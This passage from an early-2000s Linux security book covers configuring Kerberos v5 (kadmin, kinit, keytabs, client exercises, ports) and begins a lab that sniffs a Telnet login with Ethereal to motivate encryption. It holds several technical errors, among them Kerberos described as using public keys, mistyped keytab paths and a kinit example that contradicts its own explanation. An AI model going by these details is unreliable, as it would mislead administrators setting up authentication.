+(cid:2) Minimum password life (in seconds) How long a user must keep a +password before being allowed to change it. +(cid:2) Maximum password life (in seconds) The longest amount of time a +user can keep a password. +(cid:2) Minimum password length Sets the number of characters a password +must have. +When you add a principal using kadmin and do not specify a policy,the +default behavior is to establish no policy whatsoever.You can create a policy by +using the addpol command from within kadmin: +kadmin: addpol yourdomainpol +kadmin: modpol -maxlife 2/02/2004 -minlength 6 domainpol +This policy means that the principal will expire on the second day of +February 2004,and that any subsequent password change must be at least six +characters long.You can add this policy to a user named Jacob by using the +modprinc command,as follows: +modprinc –policy yourdomainpol +Using Kinit +The kinit command allows a user to obtain a TGT from the KDC.It does not +allow a user to get a host or service ticket.A host or service ticket is obtained +only when a user is successful logging into the service.Issuing the kinit com- +mand has the Kerberos client contact the KDC and obtain a TGT,as shown in +Figures 6.12 and 6.13. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 331 +Network Authentication and Encryption • Chapter 6 331 +Figure 6.12 Using the kinit Command +KDC +kinit Command +Kerberos Client +Figure 6.13 Receiving a TGT from the KDC +KDC +Ticket Granting Ticket +(TGT) +Kerberos Client +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 332 +332 Chapter 6 • Network Authentication and Encryption +Here is an example of a simple kinit session: +terminal# /usr/kerberos/bin/kinit +Password for james@YOURDOMAIN.COM: +terminal# +This session has obtained a TGT from the KDC.This credential is usually +stored on the local hard disk,usually in the /tmp/ directory.The file is usually in +the following format: +krb5cc_UID +UID is the user identification number of the user who issued the kinit com- +mand.For example,if you are root,the credential cache file would be krb5cc_0, +whereas the user with the UID of 500 would have the credential file named +krb5cc_500. +Suppose,however,that your Kerberos name was james,and that you wished to +obtain your credential,but only had access to a terminal owned by another user +named sandi.The following command would get you your own TGT: +terminal# /usr/kerberos/bin/kinit sandi +Password for sandi@YOURDOMAIN.COM: +Now,you have begun your own credential cache,which right now holds +only your TGT.For more information about using kinit,consult its man page or +the Kerberos workstation documentation in the /usr/share/doc/krb5*/ directory. +The kinit Command and Time Limits +Sometimes you may want to obtain a TGT that is valid for a period shorter than +the default (eight hours).Suppose that you know you will use this TGT for only +one hour.The following command would make the TGT valid for that period of +time: +terminal# /usr/kerberos/bin/kinit -l 1h +terminal# +Kinit and most Kerberized clients can also forward the tickets they obtain. +This means that you can obtain tickets on one host,then have them sent to +another.The following command obtains a ticket for the user named james in the +YOURDOMAIN.COM realm for two hours,then allows you to forward them, +as well: +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 333 +Network Authentication and Encryption • Chapter 6 333 +terminal# /usr/kerberos/bin/kinit –f -l 1h @YOURDOMAIN.COM +terminal# +For additional details concerning how to customize the TGT and tickets +obtained from the KDC,consult the man pages for kinit and additional clients. +Managing Kerberos Client Credentials +After you run kinit,the cache will contain only the TGT.Additional credentials, +such as actual tickets to access a daemon such as FTP,will be added only after +you access the remote host.This,in addition to properly updating the +/etc/krb5.keytab file,is a little-understood part of Kerberos configuration.To list +your current credentials,use the following command: +terminal# /usr/kerberos/bin/klist +03/21/01 3:05:53 04/21/01 13:05:53 +krbtgt/YOURNETWORK.COM@YOURNETWORK.COM +terminal# +This command shows that a TGT has been issued on March 21st for the +YOURNEWORK.COM realm.Additional options exist.Consult the klist man +page. +The kdestroy Command +When you log off of your system,you should use the kdestroy command to +eliminate your credential cache.This command erases the /tmp/ krb5cc_UID +file.You need to use this command when your TGT and other tickets expire. +Many times,a seeming Kerberos problem can be solved by erasing this cache and +using kinit over again. +NOTE +The gnome-kerberos package ships with the /usr/bin/krb5/krb5 applica- +tion, shown in Figure 6.14. It is a combination of the kinit, klist, and +kdestroy applications, because you can use it to view, delete, and obtain +credentials. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 334 +334 Chapter 6 • Network Authentication and Encryption +Figure 6.14 The krb5 Interface +WARNING +Credential caches can grow quite large, and can remain valid long after a +user walks away from the terminal. To ensure that your Kerberos realm +remains secure, encourage and train users to use kdestroy whenever +they have finished a session. Otherwise, another user can walk up to the +terminal and access network resources. +Exercise: Configuring a KDC +You now have a basic understanding of Kerberos elements.Now,take the fol- +lowing steps to configure a KDC on your Linux system.These steps will allow +you to create a Kerberos database,configure the necessary files,and create user, +host and host daemon principals. +1. Take the time to plan your DNS domain and Kerberos realm names.If +you do not have a proper DNS domain created,take the time to do this +now.Enter the following information: +Planned DNS domain name:__________________________________ +Planned Kerberos realm name:_________________________________ +2. Obtain and install Kerberos using the available RPM files.You can +download them from www.rpmfind.net.Make sure that you obtain the +packages appropriate for your Linux host: +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 335 +Network Authentication and Encryption • Chapter 6 335 +(cid:2) krb5-libs-* +(cid:2) krb5-workstation-* +(cid:2) krb5-server-* +(cid:2) krb5-devel-* +The * represents the version appropriate for your Linux host.Also, +the krb5-devel package is necessary only if you plan to develop your +own Kerberized applications.The 1.2.2-4 versions of these files are on +the accompanying CD. +3. Install the packages in the following order: +(cid:2) krb5-libs-* +(cid:2) krb5-workstation-* +(cid:2) krb5-server-* +(cid:2) krb5-devel-* +4. Now,edit the /etc/krb5.conf and /var/kerberos/krb5kdc/kadm.acl files +so that they reflect your planned Kerberos realm information.If you can, +simply substitute your DNS domain and Kerberos realm information for +all example.com/EXAMPLE.COM entries.Take special note of the +[domain_realm] entries,which map DNS domains to Kerberos realms. +This section helps you if your DNS domain is not the same as your +Kerberos realm.Properly editing the /etc/krb5.conf file ensures that you +will be able to use kadmin,kinit,and additional commands to access +the database on the KDC.You will see how you will have to do much +the same thing for each Kerberos client host. +The /var/kerberos/krb5kdc/kadm5.acl file should appear as follows: +*/admin@YOURDOMAIN.COM * +Now,anyone with the /admin instance has the power to administer +all elements of your Kerberos realm. +5. Now that you have installed the correct Kerberos RPM packages and +edited the configuration files,create the Kerberos database: +/usr/kerberos/sbin/kdb5_util create -s +You will be asked to create and confirm a password.Make sure that +you save this password in a save place.The -s option creates what is +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 336 +336 Chapter 6 • Network Authentication and Encryption +called a “stash file,”which contains the password for the Kerberos +database.If you don’t create this stash file,Kerberos will ask you for the +password each time you restart it. +6. Start the kadmin,krb5kdc,and krb24 daemons in the following order: +/etc/rc.d/init.d/krb5kdc start +/etc/rc.d/init.d/kadmin start +/etc/rc.d/init.d/krb524 start +7. To ensure that these daemons will start at the next reboot,use ntsysv to +mark the Kerberos services to start automatically. +8. Now,populate the database you have just created using the +kadmin.local command: +/usr/kerberos/sbin/kadmin.local –q "addprinc +kerberosadministrator/admin" +If you wish to use a name other than kerberosadministrator,substi- +tute your own.However,you must use the /admin instance,because +using this instance gives any user you specify the privileges to list,add, +modify,and delete users. +9. Check the /var/kerberos/krb5kdc/kdc.conf file and ensure that it +reflects the proper realm name. +10. Now that you have created an administrator account and verified all set- +tings,log on using kadmin or gkadmin: +terminal$ /usr/kerberos/sbin/kadmin –p +kerberosadministrator/admin +Authenticating as principal kerberosadministrator/admin@ +YOURDOMAIN.COM with password kadmin: +If this command fails,check your /var/kerberos/krb5kdc/kadm5.acl +file and make sure that it reads as follows: +*/admin@YOURDOMAIN.COM * +You will,of course,substitute your own realm information.Make +sure that the /etc/krb5.conf file is also correct for your Kerberos realm +and DNS information,that your system has proper DNS resolution +(both forward and reverse),and that this system is a client to the proper +DNS server. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 337 +Network Authentication and Encryption • Chapter 6 337 +11. After you have been able to obtain a kadmin prompt,enter the fol- +lowing command: +addprinc username +Where username is the username you are currently logged in as. +12. When you have added the username user,type quit to exit kadmin. +13. Now,using the username you have just added,use kinit. +14. Use klist or krb5 to verify that you can get and list a TGT.Either client +will show only the TGT,because you have not yet tried to authenticate +with any of the network hosts.You will obtain actual ticket when you +log on to remote hosts daemons.If you see a TGT,congratulations.If +you need to troubleshoot Kerberos further,reread the rest of this chapter +and consult the Kerberos documentation,which resides in various man +pages (kerberos,kadmin,kinit,and so forth),as well as /usr/share/doc/ +krb5-server-1.2.2/ and /usr/share/doc/krb5-workstation-1.2.2/ +directories. +Establishing Kerberos Client Trust +Relationships with kadmin +A trust relationship in public key cryptography allows two hosts to authenticate +each other and to decrypt information.The only way to establish a trust relation- +ship on the Kerberos client host is to use the kadmin command.The systems +administrator must extract parts of the Kerberos database and insert them onto +each client.Figure 6.15 shows the process of updating the /etc/krb5.keytab file +for each client using kadmin ktadd. +The administrator must use the kadmin -ktadd command on each Kerberos +client that wishes to participate in the Kerberos realm.The process of extracting +records populates the local host’s /etc/krb5.keytab file with the hosts and services +that the Kerberos client is allowed to use.The KDC supplies these keys. +The following example shows the kadmin ktadd -k command that gives +each client the ability to prove that it has the public keys of the services used.The +/etc/krb5.keytab file contains this information.To update the keytab file of a +Kerberos client (in this example,a host named wordsworth),you would go through +the following sequence on the client itself: +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 338 +338 Chapter 6 • Network Authentication and Encryption +terminal# /usr/kerberos/sbin/kadmin +Authenticating as principal james/admin@YOURCOMPANY.COM with password. +Enter password: +kadmin: ktadd -k /etc/krb5.keytab host/keats.yournetwork.com +Entry for principal ftp/keats.yournetwork.com with kvno 6, encryption +type DES cbc mode with CRC-32 added to keytab WRFILE:/etc/krb5.keytab. +Entry for principal host/keats.yournetwork.com with kvno 6, encryption +type Triple DES cbc mode raw added to keytab WRFILE:/etc/krb5.keytab. +kadmin: quit +terminal# +Figure 6.15 Establishing Trust Relationships Using the kadmin +ktadd Command +Client B +Administrator uses +kadmin on Client A to +update the local /etc/ +krb5.keytab file. +Public Keys +Transferred +from KDC +KDC +Public Keys +Transferred +from KDC +Administrator uses kadmin +on Client B to update the +local /etc/krb5.keytab file. +Client B +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 339 +Network Authentication and Encryption • Chapter 6 339 +Now,this host has the public key of the keats system.It is vital that you give +the host principal entry to this client.Otherwise,Kerberos will not be able to +compare information to allow the wordsworth access to keats. +Here is another example that adds the ftp/keats.yournetwork.com principal +to the wordsworth keytab (/etc/krb5.keytab): +terminal# /usr/kerberos/sbin/kadmin +Authenticating as principal james/admin@YOURCOMPANY.COM with password. +Enter password: +kadmin: ktadd -k /etc/krb5.keytab ftp/keats.yournetwork.com +Entry for principal ftp/keats.yournetwork.com with kvno 6, encryption +type DES cbc mode with CRC-32 added to keytab WRFILE:/etc/krb5.keytab. +Entry for principal ftp/keats.yournetwork.com with kvno 6, encryption +type Triple DES cbc mode raw added to keytab WRFILE:/etc/krb5.keytab. +kadmin: quit +terminal# +Assuming that the user has run kinit,this host can now properly authenticate +with keats to access the FTP server.You will have to repeat this process to add the +host/keats.yournetwork.com entry,as well.Unless you take these two steps,you +will not be able to access any daemon on the host named keats. +Additional Daemon Principal Names +Generally,you must add a principal to the Kerberos database for each service.For +example,to add smtp and pop3 principals for the host named blake,you would +create the following principals: +(cid:2) smtp/blake.yourdomain.com For a Kerberized SMTP service. +(cid:2) pop3/blake.yourdomain.com For a Kerberized POP3 service. +Remember,the text string “yourdomain”represents your DNS domain. +Kerberos does not use the word “domain”to represent its authentication space— +it uses the word “realm.”Additional Kerberized services exist.Check your xinetd +directory (usually /etc/xinetd.d/) for additional service names to add. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 340 +340 Chapter 6 • Network Authentication and Encryption +Logging On to a Kerberos Host Daemon +Figure 6.16 shows what occurs when a client with a TGT uses a Kerberized FTP +client to log on to a Kerberized FTP daemon.Client A,the Kerberized client, +first uses its TGT to request a session ticket.The Kerberos KDC checks to see if +Client B has a host principal entry,then also checks to see if Client B has a host +daemon entry for FTP.Then,the KDC determines that Client A has the proper +host and host daemon keys for client B.If all of these credentials match,then +client A can connect to client B’s FTP server. +Figure 6.16 Accessing a Kerberized Network Daemon +Client A +Ticket +Granting +Ticket (TGT) +Client A +requests and +recieves FTP +session ticket, +using TGT. +FTP Session +Allowed +KDC +Client B and KDC +communicate to +determine if access +is allowed. +Client B +Common Kerberos Client +Troubleshooting Issues and Solutions +After you are reasonably sure that your Kerberos setup is correct,consider the +following issues: +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 341 +Network Authentication and Encryption • Chapter 6 341 +(cid:2) DNS You will not be able to use Kerberos unless you have a DNS +server in place that has flawless forward and reverse zones.Simply having +a forward zone or populated /etc/hosts files is not enough to run +Kerberos properly. +(cid:2) Time skew The tickets issued by Kerberos are time-sensitive.To help +reduce authentication problems,Kerberos will not issue tickets to hosts +whose clocks are more than five minutes apart from the KDC.The NTP +is designed to ensure that all servers have the same time.The server at +www.eecis.udel.edu has additional information about NTP,including +network daemons you can install. +(cid:2) Old credentials When you try to administer Kerberos using kadmin, +it is important to realize that if you make significant changes to the +database concerning a user,you will have to use kdestroy and then +kinit to obtain new credentials. +(cid:2) Unsupported client applications Make sure that the application you +use actually supports the Kerberos protocol and that the versions match. +(cid:2) Unstarted Kerberos client daemons Check your xinetd configura- +tion on your destination server to ensure that this server has the proper +Kerberized daemon started.For example,if you wish to test Kerberos by +using your Kerberized FTP client to connect to the server named james, +make sure that the Kerberized FTP server is started on james. +(cid:2) Kerberos log files If you encounter problems,use the tail -f command +to continuously read the /var/log/kadmind.log and krb5kdc.logfiles. +(cid:2) Security concerns You must configure your Kerberos client hosts to +use only Kerberized clients.In order to use Kerberos properly,no other +client applications or server daemons should be used on the network, +unless they use OTP,encryption,or a similarly secure protocol.For +example,if you have just one Telnet daemon open and accepting con- +nections,you still have passwords crossing the network. +For more information about configuring Kerberos clients,consult the docu- +mentation in the /usr/share/doc/krb5-workstation-1.2.2/ directory. +Kerberos Client Applications +The Kerberos clients installed with the workstation package are all in the /usr/ +kerberos/bin/ directory.Here is a description of the more popular ones provided: +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 342 +342 Chapter 6 • Network Authentication and Encryption +(cid:2) kpasswd Kerberos daemon clients can use the /usr/kerberos/bin/ +kpasswd command to change passwords on the Kerberos KDC. +(cid:2) ftp A Kerberized FTP client. +(cid:2) krlogin A Kerberized rlogin client,which allows you to log in to a +remote host without providing a password.This version is an improve- +ment to the standard rlogin,because passwords are not sent in the clear. +(cid:2) krsh A Kerberized rsh client,which allows commands to be executed +on the remote host without a password. +(cid:2) ksu Requires that users contact the KDC before being allowed to +become root or any other user. +Kerberos Authentication and klogin +After you have created a principal for klogin +(klogin/hostname.domainname.com@YOURREALM.COM) and updated the +keytab files for all hosts involved,you can configure your host to allow others to +access your home directory without divulging your account password.All you +need to do is create a hidden file named .k5login in your home directory.The +leading dot (.) makes the file hidden.You must then enter the principal of the +user whom you wish to allow access.This user must,of course,be defined on the +KDC,and the host from which the user is contacting you from must have an +updated keytab file,which contains the host and host daemon name for krlogin. +If you wish to add multiple principals to the .k5login file,you can do so by +entering each principal on a separate line,as follows: +patrick@YOURREALM.COM +susan@MYREALM.ORG +These two entries make it possible for patrick and susan to access only the +home directory (the home directory of the system that contains the .k5login +file),and no other area on your machine or any other area on the network. +Should you then wish to revoke access to your home directory,simply edit the +.k5login file and remove the relevant entry. +Exercise: Configuring a Kerberos Client +In this exercise,you will add user,host,and host daemon principals to your +Kerberos realm.This exercise assumes three different systems in the following roles: +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 343 +Network Authentication and Encryption • Chapter 6 343 +(cid:2) A KDC (host A) +(cid:2) A Kerberos client running the Kerberized ftp daemon (host B). +(cid:2) A Kerberos client accessing host B’s ftp daemon (host C). +You can,of course,use fewer systems.For example,you can make the Kerberos +KDC server offer up its own FTP service and use a remote client to access it. +1. On the KDC (host A),run kadmin or gkadmin to add the following +principals: +kerberosuser1 +kerberosuser2 +host/hosta.yourdomain.com +host/hostb.yourdomain.com +host/hostc.yourdomain.com +ftp/hostb.yourdomain.com +ftp/hostc.yourdomain.com +2. Install the krb-libs and krb5-workstation packages on hosts B and C.You +do not need to install the server package on every host on the network. +3. As root on hosts B and C,create two users named kerberosuser1 and +kerberosuser2 using useradd,then use the passwd command to give each +of these users a password: +useradd kerberosuser1 +useradd kerberosuser2 +passwd kerberosuser1 +passwd kerberosuser2 +If you do not wish to create these local user accounts,you do not +have to.However,when it comes time to use kinit,you will have to +specify the user (such as kerberosuser1 or kerberosuser2) using the -p +option.Read earlier in this chapter for more information on using +kinit. +4. Run kadmin on hosts B and C.Make sure that you specify the correct +administrative user for your KDC.Issue the following commands on +both hosts B and C to the local client (not on the Kerberos KDC) from +within to populate the local /etc/krb5.keytab file with the principals of +the network hosts and daemons you wish to use: +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 344 +344 Chapter 6 • Network Authentication and Encryption +ktadd –k /etc/kb5.keytab kerberosuser1 +ktadd –k /etc/kb5.keytab kerberosuser2 +ktadd –k /etc/kb5.keytab host/hosta.yourdomain.com +ktadd –k /etc/kb5.keytab host/hostb.yourdomain.com +ktadd –k /etc/kb5.keytab host/hostc.yourdomain.com +ktadd –k /etc/kb5.keytab ftp/hostb.yourdomain.com +ktadd –k /etc/kb5.keytab ftp/hostc.yourdomain.com +These commands will transfer information from the KDC to the +/etc/krb5.keytab files on both hosts B and C. +5. Now,you need to activate the FTP daemons on the client hosts.This +involves editing the /etc/xinetd.d/gssftp file for hosts B and C.Change +the disabled = yes value to disabled = no. +6. Disable any other FTP daemons you may have active.For example,edit +the /etc/xinetd.d/wu-ftpd or /etc/xinetd.d/opieftpd so that the disabled +entry reads disabled = yes. +7. Restart xinetd: +/etc/rc.d/init.d/xinetd restart +8. Use ping to verify that hosts B and C can access host A. +9. Now,on host B,log on as kerberosuser1 and use /usr/kerberos/bin/kinit +to obtain a TGT.Alternatively,log on as any user and specify the +Kerberos user (such as kerberosuser1 or kerberosuser2) using the -p +option. +10. Use /usr/kerberos/bin/klist to view the TGT. +11. Now,use the /usr/kerberos/bin/ftp client to access host c. +12. You will be allowed access.If a problem occurs,open up two terminals +on the KDC and use the tail -f commands to read the /var/log/ +kadmind.log and /var/log/krb5kdc.log files to discover the problem. +The most common problems are that the proper host and host daemon +tickets have not been added either to the KDC,or to the keytabs of +hosts B and C. +13. After you have logged on,use /usr/kerberos/bin/klist again to view +your credential cache.You will see the host and ftp principal tickets have +now been cached.Remember,you are using Kerberos v5,so ignore any +Kerberos v4 messages. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 345 +Network Authentication and Encryption • Chapter 6 345 +Summary +In this chapter,you have been introduced to ways that allow you to avoid sniffing +attacks.Encrypting transmissions and ensuring that passwords do not cross the +network in plain text are the two strategies.You learned how to implement OTP +using OPIE,and then learned how Kerberos allows you to establish a more +robust,though involved,authentication scheme.You now know the basic moves +to take when implementing OPIE on clients and servers and have been armed +with a method for implementing Kerberos.From principal creation to under- +standing key exchange and credential confirmation,you now know what it takes +to implement Kerberos on small networks,as well as enterprise networks that use +multiple Kerberos realms. +As you implement Kerberos,you will find that you will have to dedicate +additional resources to manage Kerberos principals and secure network daemons. +You will also find that it will be necessary to troubleshoot your client/server con- +figuration.Nevertheless,these solutions will help you further secure your net- +work.Now,it is time to learn how to use encryption techniques,such as Secure +Shell,to stop sniffing attacks. +Solutions Fast Track +Understanding Network Authentication +(cid:59) Even if employees remain behind the firewall,many system services +allow clear text authentication,including Telnet,File Transfer Protocol +(FTP),and standard Network Information Service (NIS).Even though +transmissions can be encrypted,many tools exist that help hackers wage +a sniffing attack to capture encrypted information. +(cid:59) After the packets containing the encrypted passwords are captured, +hackers use cracking applications such as L0phtCrack,which are +designed to both capture and crack sniffed encrypted passwords. +Creating Authentication and Encryption Solutions +(cid:59) To authenticate safely,you have two options:Find a way to authenticate +without sending passwords across the network,or find a way to discard +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 346 +346 Chapter 6 • Network Authentication and Encryption +any password that is sent across the network. The accepted phrase for +this strategy is one-time passwords (OTP). +(cid:59) Kerberos has the added ability to encrypt transmissions after authentica- +tion occurs.The use of OTP,however,does not encrypt subsequent +transmissions.OTP is usually much easier to implement than Kerberos, +however. +(cid:59) Other encrypting solutions include Secure Sockets Layer (SSL),Secure +Shell (SSH),and IPSec. +Implementing One-Time Passwords (OTP and OPIE) +(cid:59) In the Linux world,the most universal way to implement one-time pass- +word (OTP) support in your Linux systems is to install the One-Time +Passwords in Everything (OPIE) application.OPIE supports the Message +Digest 5 (MD5) algorithm. +(cid:59) By default,OPIE does not enforce OTP whenever you log in interac- +tively.Any user is given the choice of using OTP or the standard login +procedure. +(cid:59) Using opiepasswd to create OPIE users.As soon as the opiepasswd +command is used against a user,it is then possible for that user to use +OTP to log in.The opiekey command generates responses. +(cid:59) When the systems administrator creates an OTP password list,the user +can use the opieinfo command to generate a list of passwords for later +use. +Implementing Kerberos Version 5 +(cid:59) Kerberos v5 is a revolutionary step in network authentication,because it +allows you to establish a domain that authenticates not only individual +hosts and users,but individual daemons,as well.Using Kerberos,you can +centrally control which hosts and users can access the daemons on your +network. +(cid:59) After Kerberos is established on a network,passwords do not ever cross +the network,not even in encrypted form.You can configure Kerberos to +encrypt ensuring communications between authenticated hosts. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 347 +Network Authentication and Encryption • Chapter 6 347 +(cid:59) A principal is the name for any host,service,or user that is allowed to +authenticate on a Kerberos network.A principal consists of a primary +(also known as a “root”),an instance,and a realm. +(cid:59) The kadmin application,also found in the /usr/kerberos/sbin/ direc- +tory,is designed to add principals to the Kerberos database.The kadmin +command also lists,modifies,and deletes principals.It is also used to +populate and update the Key table files for each Kerberos host. +Using kadmin and Creating +Kerberos Client Passwords +(cid:59) Standard principal policy settings include policy name,minimum pass- +word life (in seconds),maximum password life (in seconds),and min- +imum password length. +(cid:59) You can create a policy by using the addpol command from within +kadmin. +(cid:59) The kinit command allows a user to obtain a ticket granting ticket +(TGT) from the Key Distribution Center (KDC).Issuing the kinit +command has the Kerberos client contact the KDC and obtain a TGT. +(cid:59) After you run kinit,the cache will contain only the TGT.Additional +credentials,such as actual tickets to access a daemon such as FTP,will be +added only after you access the remote host. +Establishing Kerberos Client +Trust Relationships with kadmin +(cid:59) The only way to establish a trust relationship on the Kerberos client host +is to use the kadmin command. +(cid:59) The administrator must use the kadmin -ktadd command on each +Kerberos client that wishes to participate in the Kerberos realm.The +kadmin ktadd -k command gives each client the ability to prove that +it has the public keys of the services used. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 348 +348 Chapter 6 • Network Authentication and Encryption +Logging On to a Kerberos Host Daemon +(cid:59) Client A,the Kerberized client,first uses its TGT to request a session +ticket.The Kerberos KDC checks to see if Client B has a host principal +entry,then also checks to see if Client B has a host daemon entry for +FTP.Then,the KDC determines that Client A has the proper host and +host daemon keys for client B.If all of these credentials match,then +client A can connect to client B’s FTP server. +(cid:59) When you try to administer Kerberos using kadmin,it is important to +realize that if you make significant changes to the database concerning +a user,you will have to use kdestroy and then kinit to obtain new +credentials. +(cid:59) You must configure your Kerberos client hosts to use only Kerberized +clients.In order to use Kerberos properly,no other client applications or +server daemons should be used on the network,unless they use OTP, +encryption,or a similarly secure protocol. +Frequently Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q:When using OPIE,don’t clients have to log on to the same machine in order +to generate the response? +A: No.You can use any OTP generator you wish,as long as you enter the +sequence and seed numbers correctly. +Q: If I implement OTP,don’t I have to generate a list of passwords and have +carry them around with me? +A: Well,yes and no.If users have access to a Linux or Windows computer,they +can just use an application such as opiekey or WinKey.However,if no OTP +generator is available,you will then have to find a way for users to access +their sequence numbers and seed values.This is when a list becomes handy. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 349 +Network Authentication and Encryption • Chapter 6 349 +Q: Using OTP means that users don’t have to remember passwords,doesn’t it? +A: No,not at all.Users still must remember their secret keys,because they use +these keys and the server’s request to generate a response.The nice thing +about OPIE is that passwords do not cross the network. +Q: If I use OTP,usernames still cross the network unencrypted,don’t they? +A: This is true unless you use IPsec or SSH.Still,the passwords do not cross the +network. +Q: I wish to remove a principal from the keytab of one of my Kerberos clients. +How do I do this? +A: Enter kadmin as an administrative user on the Kerberos client (not the KDC) +and use the ketremove option.For example,if you wanted to remove the +principal for the user named james,you would do the following: +terminal$/usr/kerberos/sbin/kadmin +kadmin: ktremove –p james +kadmin: quit +terminal$ +Q: How do I create a backup of the Kerberos database? Also,is it possible to +create a backup KDC? +A: As for the first part of the question,you can create a backup of the KDC +database as follows: +/usr/kerberos/sbin/kdb5_util dump keatskerberos +You can then read the database using any text editor.Figure 6.17 shows +the backup database open in the pico text editor.As far as creating a backup +KDC,this is indeed possible and is expected in large networks,or in net- +works where timely authentication is vital.After all,consider the problems +that would occur if users were not able to authenticate.Information for cre- +ating a slave KDC is found in the /usr/share/doc/krb5-server*/ directory. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 350 +350 Chapter 6 • Network Authentication and Encryption +Figure 6.17 Viewing a Kerberos Backup Database +Q: In this chapter,you have discussed both OPIE and Kerberos.I would like to +access my Web server from home.Which should I use? +A: If you only have to support one Web server,using Kerberos as a solution +would be overkill.Use OPIE along with Secure Shell (SSH),and you will be +in great shape. +Q: Can Kerberos authentication cross through firewalls? +A: Yes.As long as you allow your firewall to allow the Kerberos ports,you will +have no problem.Table 6.3 provides the most often-used Kerberos ports. +Table 6.3 Kerberos ports +Kerberos Daemon +Name Port Description +krb5 88/tcp Used to send TGTs to clients +krb5 88/udp Used to send TGTs to clients +kerberos_master 751/udp The port Kerberos uses to issue +authentication tickets +kerberos_master 751/tcp Used to issue authentication tickets +kpasswd 761/tcp For the Kerberos kpasswd +command, used by clients to +change their passwords on the KDC +Continued +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 351 +Network Authentication and Encryption • Chapter 6 351 +Table 6.3 Continued +Kerberos Daemon +Name Port Description +kpop 1109/tcp The standard Pop Kerberos port +krb5_prop 754/tcp Used by the primary KDC to update +backup KDCs +eklogin 2105/tcp The port for the Kerberos rlogin +client that allows encryption +klogin 543/tcp The standard Kerberized rlogin +application for Kerberos version 5 +kshell 544/tcp The port for the Kerberized rsh +client +kerberos-adm 749/tcp The kadmin port +You may have to allow additional ports,depending upon the clients that +you wish to support.Consult the /etc/services file for a more comprehensive +list. +Q: Does the Linux version of Kerberos support Microsoft’s implementation. +A: In a word,no.Microsoft implemented several proprietary extensions to its +implementation of the Kerberos protocol. +Q:This chapter has focused on a single-realm implementation.Can you have +multiple Kerberos realms? +A:Yes.By editing the /etc/krb5.conf file,you can define multiple realms to +further organize realms according to your business needs. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 352 + +138_linux_07 6/20/01 9:44 AM Page 353 +Chapter 7 +Avoiding Sniffing +Attacks through +Encryption +Solutions in this chapter: +(cid:2) Understanding Network Encryption +(cid:2) Capturing and Analyzing Unencrypted +Network Traffic +(cid:2) Using OpenSSH to Encrypt Network Traffic +between Two Hosts +(cid:2) Installing OpenSSH +(cid:2) Configuring SSH +(cid:2) Implementing SSH to Secure Data +Transmissions over an Insecure Network +(cid:2) Capturing and Analyzing Encrypted +Network Traffic +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +353 + +138_linux_07 6/20/01 9:44 AM Page 354 +354 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Introduction +You now understand how it is possible to enhance authentication using third- +party open source software.You also understand some of the pitfalls involved in +deploying such software in various systems.For example,in the last chapter you +discovered how to deploy authentication using one-time passwords and Kerberos. +These authentication implementations enable systems to verify the identity of a +user logging on to them,and the integrity of data. +In this chapter,you will learn about solutions to deploy strong encryption to +enhance network security.Encryption ensures data confidentiality by using algo- +rithms to encrypt data before it is sent over a network.The receiving host then +decrypts the data to a readable format.The solutions in this chapter combine +both authentication and encryption,and include a step-by-step guide to imple- +menting encryption over an insecure network. +Understanding Network Encryption +Network encryption ensures that data sent across a network from one host to +another is unreadable to a third party.If a sniffer intercepts the data,it finds the +data unusable because the data is encrypted.Therefore,a hacker cannot view any +usernames or passwords,and any information sent across the network is safe.The +requirement is that all communicating systems must support the same network +encryption technique,such as Secure Shell (SSH). +Network encryption is used for any data transfer that requires confidentiality. +Since the Internet is a public network,network encryption is essential.E-com- +merce transactions must ensure confidentiality to protect credit card and personal +information.Personal banking Web sites and investment companies often require +extremely sensitive information to be sent,such as bank account numbers and tax +identification numbers.If these usernames,passwords,and personal information +fell into the wrong hands,the information could be used for a front-door attack, +since the hacker could pose as a legitimate user. +Rlogin,remote shell (rsh),and Telnet are three notoriously unsafe protocols. +They do not use encryption for remote logins or any type of data transmission. +For example,if you are an administrator and you want to log in to a system via +Telnet,your username and login are sent in clear text.Rsh and rlogin send all +data between two hosts in clear text as well (but a password is not required). +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 355 +Avoiding Sniffing Attacks through Encryption • Chapter 7 355 +If a packet sniffer captured the packets destined for the administrator’s system, +it would eventually capture the packets containing the username and password, +and the attacker could then enter the system as a legitimate user. +Capturing and Analyzing +Unencrypted Network Traffic +To view an unencrypted login session,you must capture packets during a login +session.In the following steps,you will Telnet into a host and capture the unse- +cured session with the open source packet sniffer Ethereal. +Note that in order for the following example to work properly,you must +have two systems:the Telnet client and the Telnet remote host.All Linux installa- +tions include Telnet,so no additional program is required for this example. +1. Verify that Ethereal is installed on your system by entering: +rpm –qa | grep ethereal +2. If you do not receive a reply,you need to download and install Ethereal. +Ethereal (ethereal-0.8.9-4.i386.rpm) is included on the CD accompa- +nying this book. +3. Once you have verified that Ethereal is installed,you are ready to +capture packets. +4. To add filters to Ethereal without using host names,open a command +interface and enter: +ethereal -n +5. Select the Edit menu and choose Filters.The 